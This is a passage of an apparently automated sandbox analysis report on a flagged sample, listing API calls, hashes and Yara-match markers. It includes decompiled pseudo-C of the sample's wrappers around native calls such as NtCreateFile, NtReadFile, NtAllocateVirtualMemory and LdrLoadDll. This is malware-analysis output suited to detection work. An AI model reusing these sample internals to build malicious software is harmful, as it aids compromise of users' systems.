                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 123fd1ef4fa326f641b8d61b6f6e13e0ad35159910c95a596d1be0b2d2dab567
                                              • Instruction ID: ef76748c73b546c380cbc4bc5f9e78151a58a7c05afe213159e005e06592ec92
                                              • Opcode Fuzzy Hash: 123fd1ef4fa326f641b8d61b6f6e13e0ad35159910c95a596d1be0b2d2dab567
                                              • Instruction Fuzzy Hash: AE711674A00B098FDB24DF6AD44579BBBF5BF88214F008A2ED49AD7A50DB74E805CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 028454A9
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 32bcf0c352c4bfe486a156bcdadf365bbcd195a1f44f6806bb19721d2e96a977
                                              • Instruction ID: 6090703e0d83257ad7efa4273d18fd158bbf53b4ad2af7afe4a0647cd50a8b09
                                              • Opcode Fuzzy Hash: 32bcf0c352c4bfe486a156bcdadf365bbcd195a1f44f6806bb19721d2e96a977
                                              • Instruction Fuzzy Hash: 3641EDB5D0061CCBDB24CFA9C884BDEBBB5BF88308F60846AD408AB251DB756945CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0284BE5F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: afe71d6769fc9e74232f804cca65dc338e445683f738340c7f5e853f683425cc
                                              • Instruction ID: 558ee264ed2518bff3c8fb730f3227f615d11af34a6d6ae3ad426500ce34fdc3
                                              • Opcode Fuzzy Hash: afe71d6769fc9e74232f804cca65dc338e445683f738340c7f5e853f683425cc
                                              • Instruction Fuzzy Hash: 5221E3B5D00248AFDB10CFAAD984ADEFBF4EF48324F14851AE954A3350D774A954CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0284BE5F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: f030c08b43baa973c48c2ceb269a3860c8ac4242779a25959949ba781223991b
                                              • Instruction ID: 6661757f4ce0a5fb1e2ccc7e69d1cb08a2222f085e31a022d04f79d0189f47a9
                                              • Opcode Fuzzy Hash: f030c08b43baa973c48c2ceb269a3860c8ac4242779a25959949ba781223991b
                                              • Instruction Fuzzy Hash: 4B21E3B5D00248AFDB10CFA9D884ADEFBF8EF48324F14841AE954A3310D774A954CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02849B71,00000800,00000000,00000000), ref: 02849D82
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 755ae7b7169c390c2bbac4a3f0f7b75c3e3eee121791fbe4b96d049511b27e2d
                                              • Instruction ID: 57b2407d6d355e055dd4fd416461623f90eedd65ed432829bd288ef3f7cf0bb1
                                              • Opcode Fuzzy Hash: 755ae7b7169c390c2bbac4a3f0f7b75c3e3eee121791fbe4b96d049511b27e2d
                                              • Instruction Fuzzy Hash: 4F11D3BAD002499FDB20CF9AC444BDEFBF8EF48714F14842AE559A7200C774A945CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02849B71,00000800,00000000,00000000), ref: 02849D82
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: c3f89f614f7a77d0910f770ad52b3e3aee0d64b2831e9c4fd1e07d28cd6b4f59
                                              • Instruction ID: 0cb135301d49b3c09af381f330c858c233497a542e0482d18513b25b6c4ec2a8
                                              • Opcode Fuzzy Hash: c3f89f614f7a77d0910f770ad52b3e3aee0d64b2831e9c4fd1e07d28cd6b4f59
                                              • Instruction Fuzzy Hash: 2411E7B6D002499FDB20CF9AD844BDEFBF4EF48724F14852AD469A7240C774A545CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02849AF6
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: be42b023de33df32d70671a59e6c11d3439a242dade2c77800126a15c352ee84
                                              • Instruction ID: 2436a495e6738e574a23e362b4106ff7064f7fc1beec97f6cdf7d3b924d944c9
                                              • Opcode Fuzzy Hash: be42b023de33df32d70671a59e6c11d3439a242dade2c77800126a15c352ee84
                                              • Instruction Fuzzy Hash: 491102B9D002498FCB20CF9AC444BDEFBF4AF48224F14842AD419B7200C774A545CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8cbf230deee27c49653f09e968e93e011dfc678d86385551fafbfa4b4e705346
                                              • Instruction ID: 954d8cf01b10e6678c89ffeef2d50036c45596d374e76f19c130ae859266f15f
                                              • Opcode Fuzzy Hash: 8cbf230deee27c49653f09e968e93e011dfc678d86385551fafbfa4b4e705346
                                              • Instruction Fuzzy Hash: FDA14C3AE002198FCF15DFA5C844A9EBBB7FF85304B15856AE805EB261EF31A915CF40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Executed Functions

                                              C-Code - Quality: 37%
                                              			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
                                              				void* _t18;
                                              				void* _t27;
                                              				intOrPtr* _t28;
                                              
                                              				_t13 = _a4;
                                              				_t28 = _a4 + 0xc48;
                                              				E004191F0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                              				_t4 =  &_a40; // 0x413a41
                                              				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
                                              				return _t18;
                                              			}

                                              APIs
                                              • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID: A:A
                                              • API String ID: 2738559852-2859176346
                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                              • Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                              • Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 50%
                                              			E0041871A(intOrPtr _a4, void* _a8) {
                                              				long _t8;
                                              				void* _t11;
                                              
                                              				asm("repne daa");
                                              				asm("in al, dx");
                                              				asm("popad");
                                              				asm("loope 0x35");
                                              				_t5 = _a4;
                                              				_t2 = _t5 + 0x10; // 0x300
                                              				_t3 = _t5 + 0xc50; // 0x409773
                                              				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                              				_t8 = NtClose(_a8); // executed
                                              				return _t8;
                                              			}

                                              APIs
                                              • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 3f8948348d103bbf2167bc1e43380d1d699537c023ddb6a6c82993a46c3b1a7f
                                              • Instruction ID: 9a256857486c6b04dc2d8d01bbab50f47954425687f1d86c7330f0437a7ebe71
                                              • Opcode Fuzzy Hash: 3f8948348d103bbf2167bc1e43380d1d699537c023ddb6a6c82993a46c3b1a7f
                                              • Instruction Fuzzy Hash: E5014876200208BBDB14DF99CC85EEB77A9EF88314F118559BA18AB242C630E9548BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00409B50(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8) {
                                              				char* _v8;
                                              				struct _EXCEPTION_RECORD _v12;
                                              				struct _OBJDIR_INFORMATION _v16;
                                              				char _v536;
                                              				void* _t15;
                                              				struct _OBJDIR_INFORMATION _t17;
                                              				struct _OBJDIR_INFORMATION _t18;
                                              				void* _t31;
                                              				void* _t32;
                                              				void* _t33;
                                              				void* _t34;
                                              				void* _t35;
                                              
                                              				_t32 = __esi;
                                              				_t31 = __edi;
                                              				_v8 =  &_v536;
                                              				_t15 = E0041AF80( &_v12, 0x104, _a8);
                                              				_t34 = _t33 + 0xc;
                                              				if(_t15 != 0) {
                                              					_t17 = E0041B3A0(__eflags, _v8);
                                              					_t35 = _t34 + 4;
                                              					__eflags = _t17;
                                              					if(_t17 != 0) {
                                              						E0041B620(__ebx,  &_v12, 0);
                                              						_t35 = _t35 + 8;
                                              					}
                                              					_t18 = E00419730(_t31, _t32, _v8);
                                              					_v16 = _t18;
                                              					__eflags = _t18;
                                              					if(_t18 == 0) {
                                              						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                              						return _v16;
                                              					}
                                              					return _t18;
                                              				} else {
                                              					return _t15;
                                              				}
                                              			}

                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                              • Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
                                              • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                              • Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                               			// Wrapper around the native NtCreateFile call: E004191F0 is invoked first, then the
                                               			// caller's arguments are passed through unchanged to ntdll.
                                               			E004185EB(void* __eax, void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                               				void* _v117;
                                               				intOrPtr _t21;
                                               				intOrPtr _t6;
                                               				long _t27;
                                               				void* _t38;

                                               				_t21 = _a4;
                                               				_t6 = _t21 + 0xc40; // 0xc40
                                               				E004191F0(_t38, _a4, _t6,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                               				_t27 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                               				return _t27;
                                               			}


                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 2386a416c0c71fdbb8baf5cb321fbb8465dc82a6776198798f5900b2a69635ef
                                              • Instruction ID: eadccef6660383827a1c39e062733e9e7291f8de244501940662f3f68da9609a
                                              • Opcode Fuzzy Hash: 2386a416c0c71fdbb8baf5cb321fbb8465dc82a6776198798f5900b2a69635ef
                                              • Instruction Fuzzy Hash: B501AFB2245108AFCB08CF99DC95EEB77A9AF8C354F158248FA1D97241D630E851CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                               			// Same NtCreateFile wrapper as above, entered a few bytes later (without the __eax/__edx register arguments).
                                               			E004185F0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                               				intOrPtr _t3;
                                               				long _t21;
                                               				void* _t31;

                                               				_t3 = _a4 + 0xc40; // 0xc40
                                               				E004191F0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                               				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                               				return _t21;
                                               			}


                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                              • Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                              • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                               			// Wrapper around the native NtAllocateVirtualMemory call: E004191F0 is invoked first, then the
                                               			// caller's arguments are passed through unchanged to ntdll.
                                               			E004187CA(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                               				intOrPtr _t13;
                                               				intOrPtr _t4;
                                               				long _t17;
                                               				void* _t28;

                                               				_t13 = _a4;
                                               				_t4 = _t13 + 0xc60; // 0xca0
                                               				E004191F0(_t28, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                               				_t17 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                               				return _t17;
                                               			}


                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: c7d2bccebaee648065e03798fb1cb71dd486367c3b38807e6fe45ebb4ffa1175
                                              • Instruction ID: baafc16d0dcc65a97a2a7081ec653fa0cdbc2bd5867fea8e6554ff1b4ee91aef
                                              • Opcode Fuzzy Hash: c7d2bccebaee648065e03798fb1cb71dd486367c3b38807e6fe45ebb4ffa1175
                                              • Instruction Fuzzy Hash: B9F08CB2200108AFDB14DF88CC80EEB73ACFF88304F108149FE4997241C630E851CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                               			// Same NtAllocateVirtualMemory wrapper as above, entered a few bytes later (without the register arguments).
                                               			E004187D0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                               				intOrPtr _t3;
                                               				long _t14;
                                               				void* _t21;

                                               				_t3 = _a4 + 0xc60; // 0xca0
                                               				E004191F0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                               				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                               				return _t14;
                                               			}


                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                              • Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                              • Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                               			// Wrapper around the native NtClose call: E004191F0 is invoked first, then the handle is closed.
                                               			E00418720(intOrPtr _a4, void* _a8) {
                                               				intOrPtr _t5;
                                               				intOrPtr* _t2;
                                               				intOrPtr _t3;
                                               				long _t8;
                                               				void* _t11;

                                               				_t5 = _a4;
                                               				_t2 = (intOrPtr*)(_t5 + 0x10); // 0x300
                                               				_t3 = _t5 + 0xc50; // 0x409773
                                               				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                               				_t8 = NtClose(_a8); // executed
                                               				return _t8;
                                               			}


                                              APIs
                                              • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                              • Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                              • Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 00a18a06596ad4b476a2ef211873c1c3d2092edfa43c356fa3f16d3c8c0ab8fd
                                              • Instruction ID: 1f66aa348b942f1543d33f74b6675086b27df1da0c3e8cc2a9ac19bafc2c9233
                                              • Opcode Fuzzy Hash: 00a18a06596ad4b476a2ef211873c1c3d2092edfa43c356fa3f16d3c8c0ab8fd
                                              • Instruction Fuzzy Hash: AE90026160100902D20171594404626100B9BD0381F92C032A2015556FCA658992F171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 469f09d02871ff23d8d3fb3861419080370543fdb5da11965874d7b75191da8d
                                              • Instruction ID: e13c9f4c3f3591679f70e1bc5d393f13bc1487c8d840833ea98833aea70d8273
                                              • Opcode Fuzzy Hash: 469f09d02871ff23d8d3fb3861419080370543fdb5da11965874d7b75191da8d
                                              • Instruction Fuzzy Hash: 5E90027120100813D21161594504717100A9BD0381F92C422A1415559E96968952F161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 3b05dfb0c86dddef202d0652aa1964822d066e20d16934e423689131928e5e29
                                              • Instruction ID: d5dad89dd970f4b1df63fd1e16f416388f30dba2f7063050d8a1dc5e85f7957c
                                              • Opcode Fuzzy Hash: 3b05dfb0c86dddef202d0652aa1964822d066e20d16934e423689131928e5e29
                                              • Instruction Fuzzy Hash: 6E900261242045525645B15944045175007ABE0381792C022A2405951D85669856F661
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 783ec9b52578cffa0e388dc044eb4073357bba82f5325862019c3789f9cea9dc
                                              • Instruction ID: d301415a7278175c444edfd67515c8a516b55754e09b31bbc965b00936c4f65a
                                              • Opcode Fuzzy Hash: 783ec9b52578cffa0e388dc044eb4073357bba82f5325862019c3789f9cea9dc
                                              • Instruction Fuzzy Hash: 129002A120200403420571594414626500B9BE0341B52C031E2005591EC5658891B165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 433bdfa9ac4682e1a5f4fed5306f505abbf1ae216d7634071aec7f06c53296d7
                                              • Instruction ID: 407a2508857720803f5503cf4f29efa6ac1a96e484fee0b330fbbf414f3a82cb
                                              • Opcode Fuzzy Hash: 433bdfa9ac4682e1a5f4fed5306f505abbf1ae216d7634071aec7f06c53296d7
                                              • Instruction Fuzzy Hash: 939002A134100842D20061594414B161006DBE1341F52C025E2055555E8659CC52B166
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 226f90f8aefedb5a0cae8c24f24c403566f5af5d5b0342ee4acfec0b5f23fb35
                                              • Instruction ID: 69162ed29e56e68af7b2978969ee0204f9d764519973f2f8ea5eedbe19cc768b
                                              • Opcode Fuzzy Hash: 226f90f8aefedb5a0cae8c24f24c403566f5af5d5b0342ee4acfec0b5f23fb35
                                              • Instruction Fuzzy Hash: 72900265211004030205A559070451710479BD5391352C031F2006551DD6618861B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 1e8f9e34e7256a9a974f3cddaf0f3ebbf235d585145650c4dda65b06d2cc7b00
                                              • Instruction ID: 7b611f7d2db9be6b796d577088613073eb51052201da35903ce31f64545808ae
                                              • Opcode Fuzzy Hash: 1e8f9e34e7256a9a974f3cddaf0f3ebbf235d585145650c4dda65b06d2cc7b00
                                              • Instruction Fuzzy Hash: 4B9002B120100802D2407159440475610069BD0341F52C021A6055555F86998DD5B6A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8dd3192fce5394c09b44779953a602328edc70c990b717f215e4932cca1f73ff
                                              • Instruction ID: c58cb0ec6eb548e2473b038ea265bd80684ee20eb5de19b67b3e630d8de64cc4
                                              • Opcode Fuzzy Hash: 8dd3192fce5394c09b44779953a602328edc70c990b717f215e4932cca1f73ff
                                              • Instruction Fuzzy Hash: 3590027120108C02D2106159840475A10069BD0341F56C421A5415659E86D58891B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 11f0bf54a6029bc631af4d460e26a135bda53ad9e4211d8e8688064be5d502a9
                                              • Instruction ID: f662abfc5e1220b3c0917192af0d623bbfe401405b8021a2b4bf2bca61f27f6c
                                              • Opcode Fuzzy Hash: 11f0bf54a6029bc631af4d460e26a135bda53ad9e4211d8e8688064be5d502a9
                                              • Instruction Fuzzy Hash: 9090027120100C02D2807159440465A10069BD1341F92C025A1016655ECA558A59B7E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 869d5e6d09cd8a5b408c42e5df911b350a08f1b9c7913d025a83192ed36242ba
                                              • Instruction ID: 9c44c9066dc5755a967dddd771e37cdab22114344506291eca3a738d0691b94b
                                              • Opcode Fuzzy Hash: 869d5e6d09cd8a5b408c42e5df911b350a08f1b9c7913d025a83192ed36242ba
                                              • Instruction Fuzzy Hash: 1990026121180442D30065694C14B1710069BD0343F52C125A1145555DC9558861B561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 78dc3d6e53dfd09d18f0d351c3e50b0e1df2cf7a5f4ba5c50c851e6bdb36225a
                                              • Instruction ID: 51ee488a3e20044e3fa6ddcc2a087237d3d02dbfcc1035311a8e34ff663592d5
                                              • Opcode Fuzzy Hash: 78dc3d6e53dfd09d18f0d351c3e50b0e1df2cf7a5f4ba5c50c851e6bdb36225a
                                              • Instruction Fuzzy Hash: 36900261601004424240716988449165006BFE1351752C131A1989551E85998865B6A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: f868270fd422e5fa2ad32053628b44a92dac86e885c2cfde5cb8305350acea7b
                                              • Instruction ID: 26dd0ea29e7b78e4bd277c39c79de5c2b9ff6581b8807e68f0f1dfc835ce02c2
                                              • Opcode Fuzzy Hash: f868270fd422e5fa2ad32053628b44a92dac86e885c2cfde5cb8305350acea7b
                                              • Instruction Fuzzy Hash: A190027120140802D2006159481471B10069BD0342F52C021A2155556E86658851B5B1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
